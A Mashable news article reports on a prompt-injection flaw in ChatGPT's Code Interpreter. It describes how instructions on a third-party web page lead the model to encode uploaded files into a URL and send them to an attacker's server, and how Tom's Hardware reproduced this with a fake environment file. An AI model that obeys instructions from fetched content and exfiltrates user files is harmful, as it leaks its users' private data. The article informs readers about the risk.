ChatGPT has a scary security risk after new update. Is your data in trouble?

The introduction of file uploading in ChatGPT Plus is creating some unfortunate future problems.
By Chance Townsend  on 
RGB overlay of the ChatGPT logo
Credit: Mashable / Bob Al-Greene

Thanks to new ChatGPT updates like the Code Interpreter, OpenAI's popular generative artificial intelligence is rife with more security concerns. According to research from security expert Johann Rehberger (and follow-up work from Tom's Hardware), ChatGPT has glaring security flaws that stem from its new file-upload feature.

OpenAI's recent update to ChatGPT Plus added a myriad of new features, including DALL-E image generation and the Code Interpreter, which allows Python code execution and file analysis. The code is created and run in a sandbox environment that is unfortunately vulnerable to prompt injection attacks.

A known vulnerability in ChatGPT for some time now, the attack involves tricking ChatGPT into executing instructions from a third-party URL, leading it to encode uploaded files into a URL-friendly string and send this data to a malicious website. While the likelihood of such an attack requires specific conditions (e.g., the user must actively paste a malicious URL into ChatGPT), the risk remains concerning. This security threat could be realized through various scenarios, including a trusted website being compromised with a malicious prompt — or through social engineering tactics.

Mashable Light Speed
Want more out-of-this world tech, space and science stories?
Sign up for Mashable's weekly Light Speed newsletter.
By signing up you agree to our Terms of Use and Privacy Policy.
Thanks for signing up!

Tom's Hardware did some impressive work testing just how vulnerable users may be to this attack. The exploit was tested by creating a fake environment variables file and using ChatGPT to process and inadvertently send this data to an external server. Although the exploit's effectiveness varied across sessions (e.g., ChatGPT sometimes refused to load external pages or transmit file data), it raises significant security concerns, especially given the AI's ability to read and execute Linux commands and handle user-uploaded files in a Linux-based virtual environment.

As Tom's Hardware states in its findings, despite seeming unlikely, the existence of this security loophole is significant. ChatGPT should ideally not execute instructions from external web pages, yet it does. Mashable reached out to OpenAI for comment, but it did not immediately respond to our request.

Headshot of a Black man
Chance Townsend
Assistant Editor, General Assignments

Currently residing in Austin, Texas, Chance Townsend is an Assistant Editor at Mashable. He has a Master's in Journalism from the University of North Texas with the bulk of his research primarily focused on online communities, dating apps, and professional wrestling.

In his free time, he's an avid cook, loves to sleep, and "enjoys" watching the Lions and Pistons break his heart on a weekly basis. If you have any stories or recipes that might be of interest you can reach him by email at [email protected].


Recommended For You

Trending on Mashable

NYT Connections today: See hints and answers for May 16
A phone displaying the New York Times game 'Connections.'

NYT Connections today: See hints and answers for May 17
A phone displaying the New York Times game 'Connections.'

'Wordle' today: Here's the answer hints for May 17
a phone displaying Wordle

Cicadas love to land on people. Experts explain why.
The head of a cicada that emerged in 2021 as part of Brood X.
The biggest stories of the day delivered to your inbox.
This newsletter may contain advertising, deals, or affiliate links. Subscribing to a newsletter indicates your consent to our Terms of Use and Privacy Policy. You may unsubscribe from the newsletters at any time.
Thanks for signing up. See you at your inbox!